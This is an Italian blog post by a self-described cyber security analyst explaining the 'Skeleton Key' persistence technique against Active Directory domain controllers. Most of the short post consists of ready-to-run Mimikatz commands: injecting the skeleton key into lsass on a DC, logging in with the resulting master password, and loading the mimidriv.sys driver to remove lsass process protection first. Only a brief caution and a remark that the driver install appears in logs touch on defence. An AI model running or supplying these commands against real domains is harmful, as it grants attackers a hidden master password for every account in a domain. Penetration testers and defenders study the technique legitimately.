Andrea Bruschi, Cyber Security Analyst

Persistence, Skeleton Key

Published by Andy

E' una tecnica di persistenza in cui è possibile patchare un Domain Controller(processo lsass) in maniera che sia permesso l'accesso a qualsiasi utente con una singola password. L'attacco è stato scoperto da Dell Secureworks in un malware chiamato Skeleton Key. Tutti i metodi pubblicamente conosciuti non sono persistenti se avviene il reboot delle macchine.

Il comando seguente serve per iniettare una skeleton key in un DC. Richiede privilegi di amministratore (DA). Permette di accedere qualsiasi risorsa nel dominio con il nome utente e password mimikatz. Usare con cautela!!

Invoke.Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName name.domain.local

Si accede poi con (ci sarà il prompt della password):

Enter-PSSession -ComputerName name -credential dom\Administrator

Se lsass sta girando in maniera protetta l'attacco sarà più complicato da portare a termine. E' necessario il driver di mimikatz (mimidriv.sys), deve essere salvato sul disco del DC.

mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

Attenzione, il tutto sarà visibile nei logs - Service installation (kernel mode driver)

This article is my 11th oldest. It is 174 words long